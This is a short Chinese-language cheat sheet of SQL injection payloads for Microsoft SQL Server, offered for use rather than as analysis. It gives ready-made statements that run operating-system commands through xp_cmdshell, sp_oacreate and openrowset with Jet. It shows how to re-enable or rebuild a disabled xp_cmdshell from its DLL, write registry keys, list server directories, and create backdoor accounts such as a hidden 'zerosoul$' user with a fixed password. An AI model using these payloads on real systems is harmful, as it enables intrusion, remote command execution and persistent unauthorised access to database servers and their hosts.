MS SQL Server注入语句

执行CMD命令

exec master..xp_cmdshell"net1 user zerosoul 123456 /add"

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [E:\wwwroot\cmd.exe /c net1 user>E:\wwwroot\1.txt]

(sp_oacreate依赖odsole70.dll)

沙盘模式执行

开启沙盘

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

2005开启openrowset

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user zerosoul$ 123456 /add")')

恢复xp_cmdshell(依赖xpsql70.dll或者xplog70.dll)

xp_cmdshell被禁用的情况下恢复

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

xp_cmdshell被删的情况下恢复

sp_dropextendedproc "xp_cmdshell"

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

找不到函数情况下恢复

exec sp_dropextendedproc 'xp_cmdshell'

exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'

列目录(依赖xpstar.dll)

exec xp_dirtree 'D:\Microsoft SQL Server\MSSQL\',1,1;(注意带参数1,1，否则...会比较惨= =#)

exec xp_subdirs 'c:\'(这个只能列出目录，不能列文件)

查看扩展存储过程

EXEC sp_helpextendedproc;